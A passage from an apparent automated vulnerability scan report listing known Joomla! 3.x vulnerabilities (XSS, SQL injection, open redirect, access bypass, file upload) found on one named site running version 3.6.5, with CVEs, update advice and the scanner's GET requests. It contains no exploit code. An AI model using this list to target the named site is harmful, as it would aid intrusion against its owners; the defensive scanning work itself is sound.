Joomla! versions between 3.0.0 and 3.8.7 are affected.


Request headers

119
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Multiple Cross-Site Scripting Vulnerabilities (3.0.0 - 3.9.3)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.3 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.4 or latest

References

https://developer.joomla.org/security-centre/773-20190302-core-xss-in-item-title-layout.html
(https://developer.joomla.org/security-centre/773-20190302-core-xss-in-item-title-layout.html)

https://developer.joomla.org/security-centre/774-20190303-core-xss-in-media-form-field.html
(https://developer.joomla.org/security-centre/774-20190303-core-xss-in-media-form-field.html)

CVE-2019-9711 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9711)

CVE-2019-9714 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9714)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.3 are affected.


Request headers

120
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Multiple Vulnerabilities (3.2.0 - 3.6.5)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and security bypass vulnerabilities. Exploiting
these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context
of the affected site, allowing the attacker to steal cookie-based authentication credentials, or to perform otherwise restricted
actions and subsequently upload swf files. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.6.5
are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.7.0 or latest

References

https://developer.joomla.org/security-centre/684-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/684-core-xss-vulnerability.html)

https://developer.joomla.org/security-centre/687-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/687-core-xss-vulnerability.html)

https://developer.joomla.org/security-centre/689-core-acl-violations.html (https://developer.joomla.org/security-centre/689-
core-acl-violations.html)

CVE-2017-7984 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7984)

CVE-2017-7987 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7987)

CVE-2017-7989 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7989)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.6.5 are affected.

121
Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Open Redirect (3.0.0 - 3.9.20)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an open redirect vulnerability because the application fails to properly validate user-supplied input.
Exploiting this issue may allow attackers to redirect users to arbitrary web sites and conduct phishing attacks; other attacks
are also possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.20 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.21 or latest

References

https://developer.joomla.org/security-centre/825-20200802-core-open-redirect-in-com-content-vote-feature.html
(https://developer.joomla.org/security-centre/825-20200802-core-open-redirect-in-com-content-vote-feature.html)

CVE-2020-24598 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24598)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.20 are affected.


Request headers

122
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Prototype Pollution (3.0.0 - 3.9.4)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a prototype pollution vulnerability. Exploiting this issue may allow attackers to add or modify
existing properties of an "Object", when controlling part of it's structure. Joomla! Core versions 3.x.x ranging from 3.0.0 and
up to and including 3.9.4 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.5 or latest

References

https://developer.joomla.org/security-centre/779-20190403-core-object-prototype-pollution-in-jquery-extend.html
(https://developer.joomla.org/security-centre/779-20190403-core-object-prototype-pollution-in-jquery-extend.html)

CVE-2019-11358 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.4 are affected.


Request headers

123
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Race Condition (3.0.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a race condition, where a session which was expected to be destroyed would be recreated.
Attackers can exploit this issue to perform unauthorized actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to
and including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/735-20180507-core-session-deletion-race-condition.html
(https://developer.joomla.org/security-centre/735-20180507-core-session-deletion-race-condition.html)

CVE-2018-11324 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11324)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.8.7 are affected.


Request headers

124
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.15)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.15 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.16 or latest

References

https://developer.joomla.org/security-centre/805-20200304-core-identifier-collisions-in-com-users.html
(https://developer.joomla.org/security-centre/805-20200304-core-identifier-collisions-in-com-users.html)

CVE-2020-10240 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10240)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.15 are affected.


Request headers

125
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.19)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.19 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.20 or latest

References

https://developer.joomla.org/security-centre/821-20200704-core-variable-tampering-via-user-table-class.html
(https://developer.joomla.org/security-centre/821-20200704-core-variable-tampering-via-user-table-class.html)

CVE-2020-15697 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15697)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.19 are affected.


Request headers

126
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.23)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.23 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.24 or latest

References

https://developer.joomla.org/security-centre/836-20210101-core-com-modules-exposes-module-names.html
(https://developer.joomla.org/security-centre/836-20210101-core-com-modules-exposes-module-names.html)

CVE-2021-23123 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23123)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.23 are affected.


Request headers

127
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/847-20210307-core-acl-violation-within-com-content-frontend-editing.html
(https://developer.joomla.org/security-centre/847-20210307-core-acl-violation-within-com-content-frontend-editing.html)

CVE-2021-26027 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26027)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.24 are affected.


Request headers

128
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.1.0 - 3.8.12)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently bypass ACLs. Joomla! Core versions 3.x.x ranging from 3.1.0 and up to and including
3.8.12 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.13 or latest

References

https://developer.joomla.org/security-centre/753-20181003-core-access-level-violation-in-com-tags.html
(https://developer.joomla.org/security-centre/753-20181003-core-access-level-violation-in-com-tags.html)

CVE-2018-17857 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17857)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.1.0 and 3.8.12 are affected.


Request headers

129
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.8.1)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently bypass a user's 2-factor-authentication method. Joomla! Core versions 3.x.x ranging
from 3.2.0 and up to and including 3.8.1 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.2 or latest

References

https://developer.joomla.org/security-centre/713-20171102-core-2-factor-authentication-bypass.html
(https://developer.joomla.org/security-centre/713-20171102-core-2-factor-authentication-bypass.html)

CVE-2017-16634 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16634)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.8.1 are affected.


Request headers

130
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and
including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/842-20210302-core-potential-insecure-fofencryptrandval.html
(https://developer.joomla.org/security-centre/842-20210302-core-potential-insecure-fofencryptrandval.html)

CVE-2021-23128 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23128)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.24 are affected.


Request headers

131
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and
including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/845-20210305-core-input-validation-within-the-template-manager.html
(https://developer.joomla.org/security-centre/845-20210305-core-input-validation-within-the-template-manager.html)

CVE-2021-23131 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23131)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.24 are affected.


Request headers

132
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and
including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/841-20210301-core-insecure-randomness-within-2fa-secret-generation.html
(https://developer.joomla.org/security-centre/841-20210301-core-insecure-randomness-within-2fa-secret-generation.html)

CVE-2021-23126 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23126)

CVE-2021-23127 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23127)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.24 are affected.


Request headers

133
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.4)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently bypass ACL's. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including
3.9.4 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.5 or latest

References

https://developer.joomla.org/security-centre/778-20190402-core-helpsites-refresh-endpoint-callable-for-unauthenticated-
users.html (https://developer.joomla.org/security-centre/778-20190402-core-helpsites-refresh-endpoint-callable-for-
unauthenticated-users.html)

CVE-2019-10946 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10946)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.4 are affected.


Request headers

134
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x SQL Injection (3.0.0 - 3.9.22)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latent vulnerabilities in the underlying database. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.22 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.23 or latest

References

https://www.empressia.pl/blog/184-analiza-podatnosci-sql-injection-w-cms-joomla (https://www.empressia.pl/blog/184-
analiza-podatnosci-sql-injection-w-cms-joomla)

https://github.com/HoangKien1020/Joomla-SQLinjection (https://github.com/HoangKien1020/Joomla-SQLinjection)

https://developer.joomla.org/security-centre/831-20201104-core-sql-injection-in-com-users-list-view.html
(https://developer.joomla.org/security-centre/831-20201104-core-sql-injection-in-com-users-list-view.html)

CVE-2020-35613 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35613)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.22 are affected.


Request headers

135
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x SQL Injection (3.5.0 - 3.8.5)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latent vulnerabilities in the underlying database. Joomla! Core versions 3.x.x ranging from 3.5.0 and up to and
including 3.8.5 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.6 or latest

References

http://blog.nsfocus.net/cve-2018-804-analysis/ (http://blog.nsfocus.net/cve-2018-804-analysis/)

https://paper.seebug.org/553/ (https://paper.seebug.org/553/)

https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html
(https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html)

CVE-2018-8045 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8045)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.5.0 and 3.8.5 are affected.


Request headers

136
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Arbitrary File Upload (2.5.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly
verify user-supplied input. Depending on the server configuration, an attacker can exploit this vulnerability to upload
arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege
escalation; other attacks are also possible. Joomla! Core versions ranging from 2.5.0 and up to and including 3.8.7 are
vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/730-20180502-core-add-phar-files-to-the-upload-blacklist.html
(https://developer.joomla.org/security-centre/730-20180502-core-add-phar-files-to-the-upload-blacklist.html)

CVE-2018-11322 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11322)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.8.7 are affected.


Request headers

137
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (1.0.0 - 3.9.2)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.0.0 and up to and including 3.9.2 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.3 or latest

References

https://developer.joomla.org/security-centre/766-20190202-core-browserside-mime-type-sniffing-causes-xss-attack-
vectors.html (https://developer.joomla.org/security-centre/766-20190202-core-browserside-mime-type-sniffing-causes-xss-
attack-vectors.html)

CVE-2019-7742 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7742)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.0.0 and 3.9.2 are affected.


Request headers

138
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

